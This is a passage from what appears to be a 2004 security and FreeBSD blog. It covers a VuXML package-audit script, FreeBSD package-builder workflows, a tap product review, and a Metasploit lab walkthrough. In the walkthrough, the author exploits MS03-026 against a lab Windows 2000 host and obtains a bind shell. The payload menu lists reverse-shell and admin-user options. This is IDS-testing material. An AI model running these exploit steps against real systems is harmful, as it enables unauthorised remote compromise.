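SAMPLE_VUXML = """<?xml version="1.0" encoding="utf-8"?>
<vuxml xmlns="http://www.vuxml.org/2004/vuxml">
  <vuln vid="00000000-0000-0000-0000-000000000001">
    <topic>racoon remote denial of service (constructed example)</topic>
    <affects>
      <package>
        <name>racoon</name>
        <range><lt>20040408a</lt></range>
      </package>
    </affects>
  </vuln>
  <vuln vid="00000000-0000-0000-0000-000000000002">
    <topic>libXft issue fixed in 2.1.6 (constructed example)</topic>
    <affects>
      <package>
        <name>libXft</name>
        <range><ge>2.1.0</ge><lt>2.1.6</lt></range>
      </package>
    </affects>
  </vuln>
</vuxml>
"""


def split_pkgname(pkgname):
    """'racoon-20040116a' -> ('racoon', '20040116a'); split at the last '-'
    so names containing hyphens (XFree86-libraries-4.3.0_7) still work."""
    name, _, version = pkgname.rpartition("-")
    return name, version


def parse_version(version):
    """Return (epoch, components, revision) for PORTVERSION[_REV][,EPOCH].
    Each component is (number, letters): '2.1.5_1' -> (0, [(2,''),(1,''),(5,'')], 1)
    and '20040116a' -> (0, [(20040116,'a')], 0)."""
    epoch = 0
    if "," in version:
        version, epoch_s = version.rsplit(",", 1)
        epoch = int(epoch_s)
    revision = 0
    if "_" in version:
        version, rev_s = version.rsplit("_", 1)
        revision = int(rev_s)
    components = []
    for piece in version.split("."):
        m = re.fullmatch(r"(\d+)([A-Za-z]*)", piece)
        if m is None:
            raise ValueError("unsupported version component %r in %r" % (piece, version))
        components.append((int(m.group(1)), m.group(2).lower()))
    return epoch, components, revision


def compare_versions(a, b):
    """-1, 0 or 1 as a is older than, equal to, or newer than b."""
    ea, ca, ra = parse_version(a)
    eb, cb, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    n = max(len(ca), len(cb))
    ca = ca + [(0, "")] * (n - len(ca))   # 2.1 compares like 2.1.0
    cb = cb + [(0, "")] * (n - len(cb))
    if ca != cb:
        return -1 if ca < cb else 1
    if ra != rb:
        return -1 if ra < rb else 1
    return 0


# VuXML range bounds; every bound inside one <range> must hold.
BOUNDS = {"lt": lambda c: c < 0, "le": lambda c: c <= 0, "eq": lambda c: c == 0,
          "ge": lambda c: c >= 0, "gt": lambda c: c > 0}


def in_range(version, range_el):
    for bound in range_el:
        tag = bound.tag.split("}")[-1]
        if not BOUNDS[tag](compare_versions(version, bound.text.strip())):
            return False
    return True


def audit(installed, vuxml_text=SAMPLE_VUXML):
    """Return [(pkgname, vid, topic)] for each installed package an entry hits."""
    root = ET.fromstring(vuxml_text)
    hits = []
    for pkgname in installed:
        name, version = split_pkgname(pkgname)
        for vuln in root.findall("v:vuln", NS):
            for pkg in vuln.findall("v:affects/v:package", NS):
                if pkg.findtext("v:name", namespaces=NS) != name:
                    continue
                if any(in_range(version, r) for r in pkg.findall("v:range", NS)):
                    hits.append((pkgname, vuln.get("vid"), vuln.findtext("v:topic", namespaces=NS)))
    return hits


if __name__ == "__main__":
    # Package list constructed from names that appear on this page.
    installed = ["racoon-20040116a", "libXft-2.1.5_1", "libXft-2.1.6", "gmake-3.80_2"]
    for pkgname, vid, topic in audit(installed):
        print("Affected package: %s\nType of problem: %s\nReference: %s\n" % (pkgname, topic, vid))
```

Note the pre-install check in the Ethereal example works the same way: the port's would-be package name is compared against the database before anything is built, which is why an out-of-date tree fails loudly instead of installing a known-vulnerable version.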

Update: Jacques Vidrine posted a summary of VuXML to freebsd-security on 19 Apr 04.

Monday, April 12, 2004

MetaCoretex Simplifies Database Testing

If Metasploit weren't enough, I learned of MetaCoretex recently. It's a vulnerability scanning framework currently implemented for database assessment. It's written in Java, so be sure to have the JDK already installed.

After downloading and extracting the archive, the only change I made was to modify the last line of the mctx.sh script to know where to find Java on my FreeBSD system:

/usr/local/jdk1.4.2/jre/bin/java -cp ${CP} com.securitycentric.metacoretex.Init &

Execute the mctx.sh script, and MetaCoretex will launch an easy-to-use Java GUI. I plan to take a closer look at MetaCoretex once Visigoth pushes out a new release. Since I can remind him every day at work, hopefully we'll see 0.9 soon. :)

Visigoth presented MetaCoretex at a meeting of the DC Security Geeks. After the meeting the publisher of the Security Technique online journal requested prospective writers submit stories to his site.

Metasploit Framework in Action

You may have seen the Slashdot article on the Metasploit Project. From the project's Web site:

"The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This release includes 18 exploits and 27 payloads; many of these exploits are either the only ones publicly available or just much more reliable than anything else out there. The Framework will run on any modern system that has a working Perl interpreter."

I gave the project a try. First I read the Crash Course user's guide, which told me to install p5-ReadLine-Gnu. I did so using the FreeBSD ports tree:

orr:/usr/ports/devel/p5-ReadLine-Gnu# make install
===> Vulnerability check disabled, database not found
>> Term-ReadLine-Gnu-1.14.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from http://www.cpan.dk/CPAN/modules/by-module/Term/.
Receiving Term-ReadLine-Gnu-1.14.tar.gz (65140 bytes): 100%
...truncated...

Once done, I ran the msfconsole and used one of the included exploits to compromise a Windows 2000 system in my lab. First I run msfconsole:

orr:/home/richard/framework-2.0$ perl ./msfconsole
+ -- --=[ msfconsole v2.0 [18 exploits - 27 payloads]

msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

Next I check out the loaded exploits and select one for MS03-026:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
imail_ldap IMail LDAP Service Buffer Overflow
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_resolution MSSQL 2000 Resolution Overflow
poptop_negative_read PoPToP Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_trans2open Samba trans2open Overflow
sambar6_search_results Sambar 6 Search Results Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
solaris_sadmind_exec Solaris sadmind Command Execution
warftpd_165_pass War-FTPD 1.65 PASS Overflow

msf > use msrpc_dcom_ms03_026

Once I have an exploit selected, I need to set the options it needs:

msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RPORT 135 The target port
required RHOST The target address

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.3
RHOST -> 10.10.10.3

msf msrpc_dcom_ms03_026 > show targets

Supported Exploit Targets
=========================

0 Windows NT SP6/2K/XP ALL

With an exploit selected, I also need to choose a payload. This tells the Metasploit framework how I wish to interact with the target. I choose a simple binding connection.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

winadduser Create a new user and add to local Administrators group
winbind Listen for connection and spawn a shell
winbind_stg Listen for connection and spawn a shell
winbind_stg_upexec Listen for connection then upload and exec file
winexec Execute an arbitrary command
winreverse Connect back to attacker and spawn a shell
winreverse_stg Connect back to attacker and spawn a shell
winreverse_stg_ie Listen for connection, send address of GP/LL across,
read/exec InlineEgg
winreverse_stg_upexec Connect back to attacker and spawn a shell

msf msrpc_dcom_ms03_026 > info payload winbind

Name: winbind
Version: $Revision: 1.15 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 374

Provided By:
H D Moore [Artistic License]

Available Options:
optional: EXITFUNC Exit technique: "process", "thread", "seh"
required: LPORT Listening port for bind shell

Description:
Listen for connection and spawn a shell

msf msrpc_dcom_ms03_026 > set PAYLOAD winbind
PAYLOAD -> winbind

msf msrpc_dcom_ms03_026(winbind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ---------- ------------------
required RPORT 135 The target port
required RHOST 10.10.10.3 The target address

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
optional EXITFUNC seh Exit technique: "process", "thread", "seh"
required LPORT Listening port for bind shell

msf msrpc_dcom_ms03_026(winbind) > set LPORT 9999
LPORT -> 9999

Once I have set the required options, I launch the exploit and get a shell:

msf msrpc_dcom_ms03_026(winbind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x90e5
[*] Got connection from 10.10.10.3:9999

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>netstat -na
...edited...
TCP 10.10.10.3:9999 192.168.50.2:26297 ESTABLISHED
...truncated...

I see this project providing an easy way to launch exploits to test IDS deployments. It's very powerful and flexible. Previously I used raccess to easily launch exploits for IDS testing purposes.

Monday, April 05, 2004

Flyer for Tao of NSM Book Posted

My publisher sent me a .pdf flyer for my book. I also created a books page with an abbreviated Tao of NSM table of contents listed.

Right now I'm in the copyedit phase. The publisher sends me chapters marked up in Microsoft Word and I make changes or comments as needed. I wrote most of the book in OpenOffice.org, but the publisher is more comfortable using Microsoft Office.

I just learned I was accepted to speak at USENIX Security 04 in San Diego on 9 August. I will be teaching a class on network security monitoring based on my book.

Sunday, April 04, 2004

Building and Deploying FreeBSD Packages

FreeBSD documentation is excellent, but I haven't found information on strategies for enterprise system administration duties. For example, what is the best way to deploy and upgrade software on multiple machines? Slashdot recently discussed building from source vs packages, but this topic doesn't get much public discussion. Most documentation talks about installing ports or packages from the perspective of a single machine. There's little or no material aside from newsgroup postings on ways to be more efficient.

It makes more sense to me to designate the most powerful system at hand as a "package builder." Sys admins build their own packages from source on this machine and then deploy them on workstations and other servers. For example, I use my Shuttle SB52G2, named 'neely', as a package builder. It runs FreeBSD 5.2.1, like most of the systems in my lab. Right now I'm building the newest OpenOffice port from source. It was recently updated to version 1.1.1. The FreeBSD OpenOffice.org site still shows packages for OO.org 1.1, and ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-current/All/ doesn't provide OpenOffice packages.

I'm building the package using this method:

cd /usr/ports/editors/openoffice-1.1
make package-recursive install

This tells FreeBSD to create a package for OpenOffice in /usr/ports/packages/All. (Note you need to create this directory if you don't have it already.) Saying "package-recursive" instead of just "package" tells FreeBSD to create packages of all of OpenOffice's dependencies. How do I know this? Look at /usr/ports/Mk/bsd.port.mk, where we find:

# package - Create a package from an _installed_ port.
# package-recursive - Create a package for a port and _all_ of its dependancies.

I am building OO.org on neely, but it's already installed on my laptop, 'orr'. To share the packages built on neely, I export neely's /usr/ports directory via NFS. This means I only have to upgrade the ports tree on neely. I use the following script to keep neely's ports tree up-to-date. If I want to use a specific CVS server, I comment out the SERVER variable using 'fastest_cvsup' and uncomment the SERVER variable using a named CVS server. If I want to clean up the distfiles and so forth, I uncomment the portsclean command at the end of the script.

#!/bin/sh
# Ports updater by Richard Bejtlich
# 0925 07 Nov 03
# 2100 07 Feb 04 - added portsclean -CDD

SERVER=`fastest_cvsup -q -c us`
START_TIME=`/bin/date`

#SERVER=cvsup16.freebsd.org

echo "Starting ports update at $START_TIME."

echo "cvsup -g -L 2 -h $SERVER /usr/local/etc/ports-supfile"
cvsup -g -L 2 -h $SERVER /usr/local/etc/ports-supfile

# According to portsdb(1), INDEX is updated only once per month or so.
# A look at http://www.freebsd.org/cgi/cvsweb.cgi/ports/#dirlist shows
# INDEX (the ports index for 4) and INDEX-5 (the ports index for 5).
# portsdb(1) recommends running portsdb -uU

echo "portsdb -uU"
portsdb -uU

echo "cd /var/db"
cd /var/db

echo "pkgdb -u"
pkgdb -u

echo "portversion -v"
portversion -v

echo "portupgrade -varRp"
portupgrade -varRp

#echo "portsclean -CDD"
#portsclean -CDD

echo "Done updating ports tree at `/bin/date`."

Let's say I want to update the JDK on orr. First I update neely's ports tree and update neely's ports. The "-p" switch given to portupgrade in the previous script ensures portupgrade builds a package of the JDK when it's updated. On orr, I use this command once I've mounted neely's /usr/ports to orr's /usr/ports. The "-R" tells portupgrade to upgrade packages required by the given package. "-PP" tells portupgrade to only update using packages; in other words, it won't start updating by downloading source code. "-v" means be verbose.

orr:/root# portupgrade -RvPP jdk
---> Session started at: Sun, 04 Apr 2004 11:11:56 -0400
** No need to upgrade 'perl-5.6.1_15' (>= perl-5.6.1_15). (specify -f to force)
---> Checking the availability of the latest package of 'java/javavmwrapper'
---> Found a package of 'java/javavmwrapper': /usr/ports/packages/All/javavmwrapper-1.5.tbz
---> Upgrade of java/javavmwrapper started at: Sun, 04 Apr 2004 11:12:00 -0400
---> Upgrading 'javavmwrapper-1.4' to 'javavmwrapper-1.5' (java/javavmwrapper)
using a package
---> Updating dependency info
---> Modifying /var/db/pkg/jdk-1.4.2p5/+CONTENTS
---> Modifying /var/db/pkg/linux-sun-jdk-1.4.2.02/+CONTENTS
---> Uninstallation of javavmwrapper-1.4 started at: Sun, 04 Apr 2004 11:12:05 -0400
---> Fixing up dependencies before creating a package
---> Backing up the old version
---> Uninstalling the old version
---> Deinstalling 'javavmwrapper-1.4'
pkg_delete: package 'javavmwrapper-1.4' is required by these other packages
and may not be deinstalled (but I'll delete it anyway):
jdk-1.4.2p5
linux-sun-jdk-1.4.2.02
[Updating the pkgdb in /var/db/pkg ... - 250 packages found
(-1 +0) (...) done]
---> Uninstallation of javavmwrapper-1.4 ended at: Sun, 04 Apr 2004 11:12:08 -0400
(consumed 00:00:03)
---> Installation of javavmwrapper-1.5 started at: Sun, 04 Apr 2004 11:12:08 -0400
---> Installing the new version via the package
---> Removing the temporary backup files
---> Installation of javavmwrapper-1.5 ended at: Sun, 04 Apr 2004 11:12:10 -0400
(consumed 00:00:01)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 251 packages found
(-0 +1) . done]
---> Upgrade of java/javavmwrapper ended at: Sun, 04 Apr 2004 11:12:12 -0400
(consumed 00:00:11)
** No need to upgrade 'imake-4.3.0_2' (>= imake-4.3.0_2). (specify -f to force)
** No need to upgrade 'expat-1.95.7' (>= expat-1.95.7). (specify -f to force)
** No need to upgrade 'pkgconfig-0.15.0_1' (>= pkgconfig-0.15.0_1). (specify -f to force)
** No need to upgrade 'freetype2-2.1.7_2' (>= freetype2-2.1.7_2). (specify -f to force)
** No need to upgrade 'fontconfig-2.2.2,1' (>= fontconfig-2.2.2,1). (specify -f to force)
** No need to upgrade 'XFree86-libraries-4.3.0_6' (>= XFree86-libraries-4.3.0_6).
(specify -f to force)
** No need to upgrade 'urwfonts-1.0' (>= urwfonts-1.0). (specify -f to force)
** No need to upgrade 'open-motif-2.2.2_2' (>= open-motif-2.2.2_2). (specify -f to force)
---> Checking the availability of the latest package of 'java/jdk14'
---> Found a package of 'java/jdk14': /usr/ports/packages/All/jdk-1.4.2p6_4.tbz
---> Upgrade of java/jdk14 started at: Sun, 04 Apr 2004 11:14:04 -0400
---> Upgrading 'jdk-1.4.2p5' to 'jdk-1.4.2p6_4' (java/jdk14) using a package
---> Updating dependency info
---> Uninstallation of jdk-1.4.2p5 started at: Sun, 04 Apr 2004 11:14:09 -0400
---> Fixing up dependencies before creating a package
---> Backing up the old version
---> Uninstalling the old version
---> Deinstalling 'jdk-1.4.2p5'
[Updating the pkgdb in /var/db/pkg ... - 250 packages found
(-1 +0) (...) done]
---> Uninstallation of jdk-1.4.2p5 ended at: Sun, 04 Apr 2004 11:16:31 -0400
(consumed 00:02:22)
---> Installation of jdk-1.4.2p6_4 started at: Sun, 04 Apr 2004 11:17:08 -0400
---> Installing the new version via the package

SUN COMMUNITY SOURCE LICENSE Version 2.3 (Rev. Date Feb.
23, 1999)
...edited...
---> Removing the temporary backup files
---> Installation of jdk-1.4.2p6_4 ended at: Sun, 04 Apr 2004 11:18:14 -0400 (consumed 00:01:05)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 251 packages found
(-0 +1) . done]
---> Upgrade of java/jdk14 ended at: Sun, 04 Apr 2004 11:18:19 -0400
(consumed 00:04:14)
---> Reporting the results (+:done / -:ignored / *:skipped / !:failed)
- lang/perl5 (perl-5.6.1_15)
+ java/javavmwrapper (javavmwrapper-1.4)
- devel/imake-4 (imake-4.3.0_2)
- textproc/expat2 (expat-1.95.7)
- devel/pkgconfig (pkgconfig-0.15.0_1)
- print/freetype2 (freetype2-2.1.7_2)
- x11-fonts/fontconfig (fontconfig-2.2.2,1)
- x11/XFree86-4-libraries (XFree86-libraries-4.3.0_6)
- x11-fonts/urwfonts (urwfonts-1.0)
- x11-toolkits/open-motif (open-motif-2.2.2_2)
+ java/jdk14 (jdk-1.4.2p5)
---> Session ended at: Sun, 04 Apr 2004 11:18:27 -0400 (consumed 00:06:30)

This process allows me to build all of my packages on one machine, and then install them quickly and easily on similar systems. I cannot use this method to share packages built on FreeBSD 5.x with systems running 4.x, however. At the moment I've confined myself to sharing packages between machines running strictly the same OS version.

I like this method because it also ensures I don't waste time on slower machines building packages. Furthermore, it ensures that only packages which are capable of being built are deployed on end systems. Sometimes ports are broken, so by using a dedicated package building system I test all of those issues on one box.
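Two things can go wrong with the builder-and-clients arrangement above: a client runs 'portupgrade -PP' for a port whose package was never built on the builder, or a client on one major OS version mounts packages built on another. The following pre-flight script is an added example and is not code from the original post. It assumes packages sit in a directory as NAME-VERSION.tbz files, that sort(1) understands -V, and that the builder leaves its 'uname -r' output in a .built-on file in the package directory (a convention invented for this example). The sample package directory it creates is constructed for demonstration.

```shell
#!/bin/sh
# Added example, not code from the original post. Pre-flight checks for a
# client that mounts the package builder's /usr/ports over NFS and then runs
# "portupgrade -PP": confirm a package exists for every port before starting,
# and confirm the builder's OS major version matches the client's (packages
# built on 5.x cannot be shared with 4.x, as the post notes).
# Assumptions: packages are named NAME-VERSION.tbz in PKGDIR, sort(1)
# supports -V, and the builder writes "uname -r" to PKGDIR/.built-on
# (a convention invented for this example).

# latest_pkg PKGDIR NAME: print the newest NAME-*.tbz in PKGDIR, if any.
latest_pkg() {
    pkgdir=$1
    name=$2
    # Anchor on "NAME-<digit>" so "jdk" does not also match "linux-sun-jdk".
    ls "$pkgdir" 2>/dev/null | grep "^${name}-[0-9]" | sort -V | tail -n 1
}

# os_compatible BUILDER_RELEASE CLIENT_RELEASE: succeed when the major
# versions match (5.2.1-RELEASE vs 5.1-RELEASE), fail for 5.x vs 4.x.
os_compatible() {
    [ "${1%%.*}" = "${2%%.*}" ]
}

# check_pkgs PKGDIR CLIENT_RELEASE NAME...: show the package that would be
# installed for each name; fail if any is missing or the OS stamp mismatches.
check_pkgs() {
    pkgdir=$1
    client=$2
    shift 2
    status=0
    if [ -f "$pkgdir/.built-on" ]; then
        builder=$(cat "$pkgdir/.built-on")
        if os_compatible "$builder" "$client"; then
            echo "ok      builder release $builder matches client $client"
        else
            echo "REFUSE  builder release $builder, client release $client"
            status=1
        fi
    fi
    for name in "$@"; do
        file=$(latest_pkg "$pkgdir" "$name")
        if [ -n "$file" ]; then
            echo "ok      $name -> $pkgdir/$file"
        else
            echo "MISSING $name (build it on the package builder first)"
            status=1
        fi
    done
    return $status
}

# make_fixture: create a constructed packages/All directory for demonstration,
# with the same package names that appear in the portupgrade session above.
make_fixture() {
    dir=$(mktemp -d)
    for p in javavmwrapper-1.4 javavmwrapper-1.5 jdk-1.4.2p5 jdk-1.4.2p6_4 \
             linux-sun-jdk-1.4.2.02; do
        : > "$dir/$p.tbz"
    done
    echo "5.2.1-RELEASE" > "$dir/.built-on"
    echo "$dir"
}

# Demonstration run against the constructed directory. On a real client you
# would call: check_pkgs /usr/ports/packages/All "$(uname -r)" javavmwrapper jdk
demo=$(make_fixture)
check_pkgs "$demo" 5.2.1-RELEASE javavmwrapper jdk
rm -rf "$demo"
```

Run this on the client before 'portupgrade -PP'; if it reports MISSING, build the package on the builder with 'portupgrade -p' (or 'make package-recursive') first, and if it reports REFUSE, that client needs its own builder for its OS branch.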

When I finally had the package of OpenOffice 1.1.1 built, I used 'portupgrade -PPRv openoffice' to update orr. OpenOffice installed a new copy of its localization files in ~/OpenOffice.org1.1.1 and I had to tell it to look in /usr/local/jdk1.4.2/jre to find the Java Runtime Environment it needed. I also encountered the same two missing files documented here, and used the same method to fix the issue:

orr:/home/richard/OpenOffice.org1.1.0$ find . -name libmozab*.so
./program/libmozab2.so
./program/libmozabdrv2.so
orr:/home/richard/OpenOffice.org1.1.0$ cp ./program/libmozab* /home/richard/OpenOffice.org1.1.1/program/

Saturday, April 03, 2004

Network Computing Misses the Mark

Network Computing profiled the Net Optics 10/100BaseT Port Aggregator Tap. This device is unique in that it combines the two transmit lines from ports A and B into a single output, adding memory to buffer bursts exceeding 100 Mbps. I was glad to see this product receive attention in Network Computing, but I think the reviewer missed the mark. I was especially disappointed to read this comment:

"...the unit is cost-effective only if you need to multiplex a full-duplex network onto a half-duplex connection, expect short traffic bursts above 100 percent utilization or can't risk a down link from a loss of power on the tap. If none of these conditions apply, you're better off buying a switch with a mirror port off eBay for about $300."

Does this author seriously recommend enterprise customers buy equipment from eBay? I'm a big eBay fan, having bought many servers from eBay for my home network. I wouldn't recommend doing the same at work. Furthermore, is Network Computing advocating buying Cisco gear from eBay? Do they know a purchase of auctioned Cisco gear doesn't include a license for IOS? Cisco allows customers to buy licenses for used equipment, but their pricing is so outrageous it makes sense to buy new equipment.

You can buy a new 12 port Cisco 2950 for a little over $600 at CDW.com. A cheap SMARTNet contract costs less than $100. So, for $700, you have a device with a SPAN port to watch network traffic in place of the tap. Unfortunately, the SPAN port hides link errors from the monitor. The SPAN port also isn't built to handle traffic over 100 Mbps like the memory-enhanced Net Optics Port Aggregator.

At this point the switch advocate might want to invest in a switch with a gigabit SPAN port, like the 2950T. Now the cost of the switch alone is over $900 and the price advantage compared to the tap disappears. (The tap is listed at $950 in the NWC story.)

There's a reason why Net Optics priced their product as they did. They are selling professional-grade devices built for serious monitoring that preserves full duplex links.